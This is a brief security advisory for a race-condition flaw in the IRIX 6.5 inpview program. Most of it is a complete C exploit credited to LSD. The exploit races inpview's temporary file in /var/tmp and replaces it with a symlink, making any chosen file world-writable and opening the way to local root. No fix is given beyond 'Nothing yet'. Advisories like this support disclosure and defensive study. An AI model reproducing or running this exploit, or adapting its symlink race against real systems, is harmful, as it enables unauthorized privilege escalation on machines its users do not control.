|
COMMAND inpview SYSTEMS AFFECTED IRIX 6.5, 6.5.8 PROBLEM There exists a race condition vulnerability in the inpview program. When appropriately exploited it can lead to a local root compromise on a vulnerable system. Found by LSD. /*## copyright LAST STAGE OF DELIRIUM jan 2000 poland *://lsd-pl.net/ #*/ /*## /usr/lib/InPerson/inpview #*/ /* sets rw-rw-rw permissions */ #include <sys/types.h> #include <dirent.h> #include <stdio.h> main(int argc,char **argv){ DIR *dirp;struct dirent *dentp; printf("copyright LAST STAGE OF DELIRIUM jan 2000 poland //lsd-pl.net/\n"); printf("/usr/lib/InPerson/inpview for irix 6.5 6.5.8 IP:all\n\n"); if(argc!=2){ printf("usage: %s file\n",argv[0]); exit(-1); } if(!fork()){ nice(-20);sleep(2);close(0);close(1);close(2); execle("/usr/lib/InPerson/inpview","lsd",0,0); } printf("looking for temporary file... ");fflush(stdout); chdir("/var/tmp"); dirp=opendir("."); while(1){ if((dentp=readdir(dirp))==NULL) {rewinddir(dirp);continue;} if(!strncmp(dentp->d_name,".ilmpAAA",8)) break; } closedir(dirp); printf("found!\n"); while(1){ if(!symlink(argv[1],dentp->d_name)) break; } sleep(2); unlink(dentp->d_name); execl("/bin/ls","ls","-l",argv[1],0); } SOLUTION Nothing yet.